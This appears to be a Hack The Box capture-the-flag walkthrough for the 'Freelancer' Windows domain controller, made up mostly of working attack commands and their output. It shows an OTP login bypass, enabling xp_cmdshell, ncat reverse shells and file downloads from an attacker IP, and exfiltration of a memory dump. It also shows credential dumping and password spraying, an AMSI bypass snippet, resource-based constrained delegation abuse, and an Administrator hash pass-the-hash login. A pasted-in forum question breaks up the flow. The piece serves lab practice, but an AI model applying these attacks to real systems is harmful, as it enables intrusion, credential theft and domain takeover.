HTB - Freelancer [Hard]
TCP Scan
> TARGET=10.129.69.99 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 nginx 1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
|_http-server-header: nginx/1.25.5
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-02 03:28:45Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51703/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51707/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
|_ Message signing enabled and required
- add host
echo '10.129.69.99 freelancer.htb' >> /etc/hosts
enum
> enum4linux freelancer.htb
Domain Name: FREELANCER
Domain Sid: S-1-5-21-3542429192-2036945976-3483670807
userenum
- sign up as employer, using a complex password Note: After creating your employer account, your account will be inactive until our team reviews your account details and contacts you by email to activate your account.
- recover the account at http://freelancer.htb/accounts/recovery/
- then login to access the account
- an admin account can be found at:http://freelancer.htb/accounts/profile/visit/2/
- qrcode: http://freelancer.htb/accounts/login/otp/MTAwMTE=/1f593250adac916c090bc7e5db6e8c09/
- use an admin id (i.e 2) and substitue into the above qr code
http://freelancer.htb/accounts/login/otp/Mgo=/65018e8fbb17e2fd5bd0d0982c8f92b7/
- now, you are logged in as admin
johnHalond@freelancer.htb
foothold
- go to /admin and execute SQL command
SELECT * FROM INFORMATION_SCHEMA.TABLES;
pbkdf2_sha256$600000$IgjtPcBB9VySMPXoeAc8PL$pmpMU81uwwKvdxUBNVk/K4Wwh4pw/fWIseSx4XkyMJo= admin
pbkdf2_sha256$600000$tip7FkNIoN7nKNTLckQuiY$Q6g1Qx0B8ul/qxGQ0hX4lYoHc3jxkrWaf3lZvNknfWU= Camellia19970
pbkdf2_sha256$600000$x9n1jiojmHAAzp3RSfvh3A$UmFMGDpFb6Gjz1XHmqNoO2eH7+7kYFfrDahLkJGpoUo= crista.W
pbkdf2_sha256$600000$R9zyIpTUoHWkY3OK9mDf80$Qzm3CzI3RN6sJ3c8Ntuif9hqjZCIe+J9DxQGgPgVc3I= ItachiUchiha
pbkdf2_sha256$600000$4KqR8oqlwUMVVjZuzbz4Wu$2mdmIWr5SyIdLBngGve3pZyS1KaOO4+hlXgmxAeGtVs= JohntheCarter
pbkdf2_sha256$600000$jP0nxcmm3rWlUWkf1xBqhE$mnABoJ2VkzyUi1LC+IuwjJZOs4/z6yqQG4tpJy1b86A= Jonathon.R
pbkdf2_sha256$600000$n807xz2S84KMIXaCE1d8cd$HS+8AffbYcIHSXTE7LoYtTiJRAmAqrkq7o+RAqZDPys= lisa.Ar
pbkdf2_sha256$600000$sLNgktJGLeN8BE9mzu7ZaH$dDbEJQWTdNGhw0xfJKzBvAhg+6Ag76WaXeFgjUKE89U= Markos
pbkdf2_sha256$600000$BYsJKIsg3DqI3DxZ08AL5t$4NYhZbnmJY7qQOsZADGbdDZk5EyS7NBv0NVA21LKLs0= martin1234
pbkdf2_sha256$600000$Vv05zVNTevRy9j29n3nnmC$WIrntfpqMYGv7x79UZtOXOLOmnskyHItdxKMzh0BPRY= maya001
pbkdf2_sha256$600000$ItLrs0zNKnvHpa8x81YUET$znvkVByIaU8U+s41mE6RjOd9yrpe1DLBF/l76bMznwo= Philippos
pbkdf2_sha256$600000$eyWcuxHnbIoONyvdQ3tZaM$TN4+gH91PqmpGSKpDZiivK1TqGbNfXErBEa558isebo= SaraArkhader
pbkdf2_sha256$600000$ok26XbM8us6jrG4BvlsM6h$IZbj6fZzUIagbziFSpPP68olFK7yrUCFTAZmK7qo7co= test
pbkdf2_sha256$600000$LCdispX2eABGjp4wQpAkZt$UqGIDDNd9Mnkoa8xMw3DTvW9x50JSV94OALXBNNtisw= test1
pbkdf2_sha256$600000$6z0gkQxAgg6ttMJUL1MKLE$iDl9amRUgVNXxVAsUaPhjVKvqgS6i5EETFeFZKlr3e0= tomHazard
- upgrade user to sysadmin
EXECUTE AS LOGIN = 'SA';
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin';
sp_configure 'Show Advanced Options', 1
RECONFIGURE
sp_configure 'xp_cmdshell', 1
RECONFIGURE
- reverse shell
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/ncat.exe -o c:\Users\sql_svc\Desktop\ncat.exe'
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/libssl-3.dll -o c:\Users\sql_svc\Desktop\libssl-3.dll'
EXEC master..xp_cmdshell 'curl -s http://10.10.14.58/libcrypto-3.dll -o c:\Users\sql_svc\Desktop\libcrypto-3.dll'
EXEC xp_cmdshell 'c:\Users\sql_svc\Desktop\ncat.exe 10.10.14.58 4444 -e cmd.exe'
user: mikasaAckerman
- found password in
c:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU>type sql-Configuration.INI
type sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
- compose user and password lists
# users.txt
Administrator
alex.hill
carol.poland
d.jones
dthomas
ereed
Ethan.l
evelyn.adams
Guest
hking
jen.brown
jgreen
jmartinez
krbtgt
leon.sk
lkazanof
lorra199
maya.artmes
michael.williams
mikasaAckerman
olivia.garcia
samuel.turner
sdavis
sophia.h
sql_svc
SQLBackupOperator
sshd
taylor
wwalker
# passwords.txt
IL0v3ErenY3ager
t3mp0r@ryS@PWD
- password spray
> crackmapexec smb freelancer.htb -u users.txt -p passwords.txt
SMB freelancer.htb 445 DC [+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
mikasaAckerman:IL0v3ErenY3ager
- https://github.com/antonioCoco/RunasCs
.\RunasCs.exe mikasaAckerman IL0v3ErenY3ager cmd.exe -r 10.10.14.58:443
c:\Users\mikasaAckerman\Desktop>type user.txt
type user.txt
9971bcc8b11abfa6b6bb14e3fe00c1a3
user: lorra199
c:\Users\mikasaAckerman\Desktop>type mail.txt
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,
- re-upload ncat
curl http://10.10.14.58/ncat.exe -o c:\temp\ncat.exe
curl http://10.10.14.58/libssl-3.dll -o c:\temp\libssl-3.dll
curl http://10.10.14.58/libcrypto-3.dll -o c:\temp\libcrypto-3.dll
- download the MEMORY.7z file
c:\temp\ncat.exe 10.10.14.58 6666 < MEMORY.7z
- unzip to get a dump file, then extract the hives using https://github.com/ufrisk/MemProcFS
- it will corrupt your file system, so use a separate VM
https://github.com/ufrisk/MemProcFS
this may be useful then try bypass AMSI and dump something
Grab the 3 hives and dump the passwords
impacket-secretsdump -sam SAM.reghive -system SYSTEM.reghive -security SECURITY.reghive local
Where it says "Unknown User" is the password for lorra199. You can use runascs again or evil-winrm.
I'm currently stuck doing the dcsync.
I have created a new machineaccount with msds-allowedtoactonbehalfofotheridentity and can create a ccache ticket with getST.
But secrets-dump keeps failing with STATUS_MORE_PROCESSING_REQUIRED.
Not sure if I'm doing something wrong or something is broken. I also keep having to sync clocks because of skew.
Any hints?
I have used this tool that somebody linked earlier:
https://github.com/ufrisk/MemProcFS
Then grabbed the ...MACHINE_SYSTEM.reghive etc. from registry\hive_files
- login as lorra199
evil-winrm -i freelancer.htb -u lorra199 -p PWN3D#l0rr@Armessa199
user: liza.kazanof
- list deleted objects
Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
memberOf: {CN=Remote Management Users,CN=Builtin,DC=freelancer,DC=htb, CN=Backup Operators,CN=Builtin,DC=freelancer,DC=htb}
- restore
liza.kazanof
, inBackup Operators
group
# get the guid of existing user
Get-ADObject -filter ' name -eq "Liza Kazanof"' -property *
# remove the existing user
remove-adobject -identity 501442ec-1e03-4451-949b-4770f98b7f52
# restore the deleted user
Restore-ADObject -identity ebe15df5-e265-45ec-b7fc-359877217138 -NewName liza.kazanof
# upload ncat
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/ncat.exe -o C:\temp\ncat.exe
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/libssl-3.dll -o C:\temp\libssl-3.dll
*Evil-WinRM* PS C:\temp> curl http://10.10.14.58/libcrypto-3.dll -o C:\temp\libcrypto-3.dll
$SecPassword = ConvertTo-SecureString 'RockYou!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('liza.kazanof', $SecPassword)
$session = New-PSSession -Credential $Cred
Invoke-Command -Session $session -scriptblock { c:\temp\ncat.exe 10.10.14.58 5555 -e powershell.exe }
root
$a = [Ref].Assembly.GetTypes() | ?{$_.Name -like '*siUtils'}
$b = $a.GetFields('NonPublic,Static') | ?{$_.Name -like '*siContext'}
[IntPtr]$c = $b.GetValue($null)
[Int32[]]$d = @(0xff)
[System.Runtime.InteropServices.Marshal]::Copy($d, 0, $c, 1)
- setup powerview and powermad
- https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
- https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
curl http://10.10.14.58/PowerView.ps1 -o PowerView.ps1
curl http://10.10.14.58/PowerMad.ps1 -o PowerMad.ps1
Import-Module .\PowerView.ps1
Import-Module .\PowerMad.ps1
- create new attacker machine
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
- get tgt
rdate -n freelancer.htb && impacket-getST -spn 'cifs/dc.freelancer.htb' -impersonate 'Administrator' 'freelancer/attackersystem$:Summer2018!' -dc-ip dc.freelancer.htb
- dump secrets
rdate -n freelancer.htb && KRB5CCNAME=Administrator@cifs_dc.freelancer.htb@FREELANCER.HTB.ccache impacket-secretsdump freelancer/administrator@dc.freelancer.htb -k -no-pass
- login and get flag
evil-winrm -i dc.freelancer.htb -u administrator -H 0039318f1e8274633445bce32ad1a290
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> ls
Directory: C:\Users\Administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/3/2024 7:30 AM 34 root.txt
ty*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
b69fbe378351f45e2414380b31d5c6e5
Support meowmeow
If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack